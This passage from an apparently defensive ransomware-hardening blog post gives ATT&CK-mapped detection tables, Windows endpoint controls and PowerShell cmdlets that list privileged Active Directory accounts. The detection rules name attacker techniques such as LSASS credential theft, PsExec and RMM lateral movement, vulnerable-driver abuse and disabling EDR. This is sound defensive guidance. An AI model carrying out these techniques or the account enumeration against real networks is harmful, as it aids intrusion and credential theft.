target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1021.002 – Remote Services: SMB/Windows Admin Shares</span></a></p> <p><a href="https://attack.mitre.org/techniques/T1570/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1570 – Lateral Tool Transfer</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for attempted execution of PsExec on systems where PsExec is disabled or where it deviates from normal activity.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Process Creation Event Involving a COM Object by Different User</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1021/003/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1021.003 – Remote Services: Distributed Component Object Model</span></a></p> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for process creation events including COM objects that are initiated by an account that is not currently the logged-in user for the system.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">High Volume of DCOM-Related Activity</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1021/003/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1021.003 – Remote Services: Distributed Component Object Model</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for a sharp increase in volume of DCOM-related activity. </span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Third-Party Remote Access Applications</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1219/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1219 – Remote Access Software</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for anomalous use of</span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">third-party remote access applications. This type of activity could indicate a threat actor is attempting to use third-party remote access applications as an alternate communication channel or for creating remote interactive sessions.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">BYOVD - EDR/AV Tampering via Vulnerable Drivers</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1068/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1068 - Exploitation for Privilege Escalation</span></a></p> <p><a href="https://attack.mitre.org/techniques/T1562/001/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1562.001 - Impair Defenses</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for kernel driver installations (Sysmon Event ID 6) where the loaded driver hash matches known vulnerable drivers from the LOLDrivers project.</span></p> <p><span style="vertical-align: baseline;">Alert on new service creation (Event ID 7045) loading .sys files from user-writable paths (e.g., %TEMP%, %APPDATA%). </span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">RMM Tool Abuse for Lateral Movement</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1219/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1219 - Remote Access Tools</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for installation or execution of legitimate RMM tools (ScreenConnect/ConnectWise, AnyDesk, Atera, Splashtop, TeamViewer) that are not part of the organization's approved toolset.</span></p> <p><span style="vertical-align: baseline;">Monitor for new service installations matching known RMM tool signatures.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 18: Detection opportunities for common lateral movement tools and methods</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Additional Endpoint Hardening</span></h4> <p><span style="vertical-align: baseline;">To help protect against malicious binaries, malware, and encryptors being invoked on endpoints, additional security hardening technologies and controls should be considered. Examples of additional security controls for consideration for Windows-based endpoints are provided as follows.</span></p> <h5><span style="vertical-align: baseline;">Windows Defender Application Control</span></h5> <p><span style="vertical-align: baseline;">Windows Defender Application Control is a set of inherent configuration settings within Active Directory that provide lockdown and control mechanisms for controlling which applications and files users can run on endpoints. With this functionality, the following types of rules can be configured within GPOs:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Publisher rules: Can be leveraged to allow or restrict execution of files based upon digital signatures and other attributes</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Path rules: Can be leveraged to allow or restrict file execution or access based upon files residing in specific path</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">File hash rules: Can be leveraged to allow or restrict file execution based on a file's hash</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Additional information related to <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/applocker-overview" rel="noopener" target="_blank">Windows Defender Application Control</a></span><span style="vertical-align: baseline;">.</span></p> <h5><span style="vertical-align: baseline;">Microsoft Defender Attack Surface Reduction</span></h5> <p><span style="vertical-align: baseline;">Microsoft Defender Attack Surface Reduction (ASR) rules can help protect against various threats, including:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A threat actor launching executable files and scripts that attempt to download or run files</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A threat actor running obfuscated or suspicious scripts</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A threat actor invoking credential theft tools that interface with Local Security Authority Subsystem Service (LSASS)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A threat actor invoking PsExec or WMI commands</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Normalizing and blocking behaviors that applications do not usually initiate as part of standardized activity</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Blocking executable content from email clients and web mail (phishing)</span></p> </li> </ul> <p><span style="vertical-align: baseline;">ASR requires a Windows E3 license or above. A Windows E5 license provides advanced management capabilities for ASR.</span></p> <p><span style="vertical-align: baseline;">Additional information related to <a href="https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction" rel="noopener" target="_blank">Microsoft Defender Attack Surface Reduction functionality</a></span><span style="vertical-align: baseline;">.</span></p> <h5><span style="vertical-align: baseline;">Controlled Folder Access</span></h5> <p><span style="vertical-align: baseline;">Controlled folder access can help protect data from being encrypted by ransomware. Beginning with Windows 10 version 1709+ and Windows Server 2019+, controlled folder access was introduced within Windows Defender Antivirus (as part of Windows Defender Exploit Guard). </span></p> <p><span style="vertical-align: baseline;">Once controlled folder access is enabled, applications and executable files are assessed by Windows Defender Antivirus, which then determines if an application is malicious or safe. If an application is determined to be malicious or suspicious, it will be blocked from making changes to any files in a protected folder.</span></p> <p><span style="vertical-align: baseline;">Once enabled, controlled folder access will apply to a number of system folders and default locations, including:</span></p></div> <div class="block-paragraph_advanced"><ul> <li>Documents <ul> <li><code>C:\users\&lt;username&gt;\Documents</code></li> <li><code>C:\users\Public\Documents</code></li> </ul> </li> <li>Pictures <ul> <li><code>C:\users\&lt;username&gt;\Pictures</code></li> <li><code>C:\users\Public\Pictures</code></li> </ul> </li> <li>Videos <ul> <li><code>C:\users\&lt;username&gt;\Videos</code></li> <li><code>C:\users\Public\Videos</code></li> </ul> </li> <li>Music <ul> <li><code>C:\users\&lt;username&gt;\Music</code></li> <li><code>C:\users\Public\Music</code></li> </ul> </li> <li>Desktop <ul> <li><code>C:\users\&lt;username&gt;\Desktop</code></li> <li><code>C:\users\Public\Desktop</code></li> </ul> </li> <li>Favorites <ul> <li><code>C:\users\&lt;username&gt;\Favorites</code></li> </ul> </li> </ul></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Additional folders can be added using the Windows Security application, Group Policy, PowerShell, or mobile device management (MDM) configuration service providers (CSPs). Additionally, applications can be allow-listed for access to protected folders.</span></p> <p><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">For controlled folder access to fully function, Windows Defender's </span><span style="font-style: italic; vertical-align: baseline;">Real Time Protection</span><span style="vertical-align: baseline;"> setting must be enabled.</span></p> <p><span style="vertical-align: baseline;">Additional information related to <a href="https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-controlled-folders" rel="noopener" target="_blank">controlled folder access</a></span><span style="vertical-align: baseline;">.</span></p> <h5><span style="vertical-align: baseline;">Tamper Protection</span></h5> <p><span style="vertical-align: baseline;">Threat actors will often attempt to disable security features on endpoints. Tamper protection either in Windows (via Microsoft Defender for Endpoint) or integrated within third-party AV/EDR platforms can help protect security tools from being modified or stopped by a threat actor. Organizations should review the configuration of security technologies that are deployed to endpoints and verify if tamper protection is (or can be) enabled to protect against unauthorized modification. Once implemented, organizations should test and validate that the tamper protection controls behave as expected as different products offer different levels of protection.</span></p> <p><span style="vertical-align: baseline;">Additional information related to <a href="https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection" rel="noopener" target="_blank">tamper protection for Windows Defender for Endpoint</a></span><span style="vertical-align: baseline;">.</span></p> <h4><span style="vertical-align: baseline;">Detection Opportunities for Tamper Protection Events</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Threat Actor Attempting to Disable Security Tooling on an Endpoint</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1562/001/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1562.001 - Disable or Modify Tools</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for evidence of processes or command-line arguments correlating to security tools/services being stopped.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 19: Detection opportunities for tamper protection events</span></div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">4. Credential Exposure and Account Protections</span></h3> <h4><span style="vertical-align: baseline;">Identification of Privileged Accounts and Groups</span></h4> <p><span style="vertical-align: baseline;">Threat actors will prioritize identifying privileged accounts as part of reconnaissance efforts. Once identified, threat actors will attempt to obtain credentials for these accounts for lateral movement, persistence, and mission fulfillment.</span></p> <p><span style="vertical-align: baseline;">Organizations should proactively focus on identifying and reviewing the scope of accounts and groups within Active Directory that have an elevated level of privilege. An elevated level of privilege can be determined by the following criteria:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Accounts or nested groups that are assigned membership into default domain and Exchange-based privileged groups (Figure 29)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Accounts or nested groups that are assigned membership into security groups protected by </span><code style="vertical-align: baseline;">AdminSDHolder</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Accounts or groups assigned permissions for organizational units (OUs) housing privileged accounts, groups, or endpoints</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Accounts or groups assigned specific extended right permissions either directly at the root of the domain or for OUs where permissions are inherited by child objects. Examples include:</span></p> <ul> <li><code style="vertical-align: baseline;">DS-Replication-Get-Changes-All</code></li> <li><code style="vertical-align: baseline;">Administer Exchange Information Store</code></li> <li><code style="vertical-align: baseline;">View Exchange Information Store Status</code></li> <li><code style="vertical-align: baseline;">Create-Inbound-Forest-Trust</code></li> <li><code style="vertical-align: baseline;">Migrate-SID-History</code></li> <li><code style="vertical-align: baseline;">Reanimate-Tombstones</code></li> <li><code style="vertical-align: baseline;">View Exchange Information Store Status</code></li> <li><code style="vertical-align: baseline;">User-Force-Change-Password</code></li> </ul> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Accounts or groups assigned permissions for modifying or linking GPOs</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Accounts or groups assigned explicit permissions on domain controllers or Tier 0 endpoints</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Accounts or groups assigned directory service replication permissions</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Accounts or groups with local administrative access on all endpoints (or a large scope of critical assets) in a domain</span></p> </li> </ul> <p><span style="vertical-align: baseline;">To identify accounts that are provided membership into default domain-based privileged groups or are protected by </span><code style="vertical-align: baseline;">AdminSDHolder</code><span style="vertical-align: baseline;">, the following PowerShell cmdlets can be run from a domain controller.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>get-ADGroupMember -Identity "Domain Admins" -Recursive | export-csv -path &lt;output directory&gt;\DomainAdmins.csv -NoTypeInformation get-ADGroupMember -Identity "Enterprise Admins" -Recursive | export-csv -path &lt;output directory&gt;\EnterpriseAdmins.csv -NoTypeInformation get-ADGroupMember -Identity "Schema Admins" -Recursive | export-csv -path &lt;output directory&gt;\SchemaAdmins.csv -NoTypeInformation get-ADGroupMember -Identity "Administrators" -Recursive | export-csv -path &lt;output directory&gt;\Administrators.csv -NoTypeInformation get-ADGroupMember -Identity "Account Operators" -Recursive | export-csv -path &lt;output directory&gt;\AccountOperators.csv -NoTypeInformation get-ADGroupMember -Identity "Backup Operators" -Recursive | export-csv -path &lt;output directory&gt;\BackupOperators.csv -NoTypeInformation get-ADGroupMember -Identity "Cert Publishers" -Recursive | export-csv -path &lt;output directory&gt;\CertPublishers.csv -NoTypeInformation get-ADGroupMember -Identity "Print Operators" -Recursive | export-csv -path &lt;output directory&gt;\PrintOperators.csv -NoTypeInformation get-ADGroupMember -Identity "Server Operators" -Recursive | export-csv -path &lt;output directory&gt;\ServerOperators.csv -NoTypeInformation get-ADGroupMember -Identity "DNSAdmins" -Recursive | export-csv -path &lt;output directory&gt;\DNSAdmins.csv -NoTypeInformation get-ADGroupMember -Identity "Group Policy Creator Owners" -Recursive | export-csv -path &lt;output directory&gt;\Group-Policy-Creator-Owners.csv -NoTypeInformation get-ADGroupMember -Identity "Exchange Trusted Subsystem" -Recursive | export-csv -path &lt;output directory&gt;\Exchange-Trusted-Subsystem.csv -NoTypeInformation get-ADGroupMember -Identity "Exchange Windows Permissions" -Recursive | export-csv -path &lt;output directory&gt;\Exchange-Windows-Permissions.csv -NoTypeInformation get-ADGroupMember -Identity "Exchange Recipient Administrators" -Recursive | export-csv -path &lt;output directory&gt;\Exchange-Recipient-Admins.csv -NoTypeInformation get-ADUser -Filter {(AdminCount -eq 1) -And (Enabled -eq $True)} | Select-Object Name, DistinguishedName | export-csv -path &lt;output directory&gt;\AdminSDHolder_Enabled.csv</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 29: Commands to identify domain and exchange-based privileged accounts</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Any privileged accounts granted membership into additional security groups can provide a threat actor with a potential path to domain administration-level permissions based upon endpoints where the accounts have permissions to log on or remotely access systems.</span></p> <p><span style="vertical-align: baseline;">Ideally, only a small scope of accounts should be provided with highly privileged access within a domain. Accounts with highly privileged permissions should </span><strong style="vertical-align: baseline;">not</strong><span style="vertical-align: baseline;"> be leveraged for daily use; used for interactive or remote logons to workstations, laptops, or common servers; or used for performing functions on non-domain controller (Tier 0) assets.For additional recommendations for restricting access for privileged accounts, reference the Privileged Account Logon Restrictions</span><span style="vertical-align: baseline;"> section of this blog post.</span></p> <h4><span style="vertical-align: baseline;">Detection Opportunities for Privileged Accounts, Groups, and GPO Modifications</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid 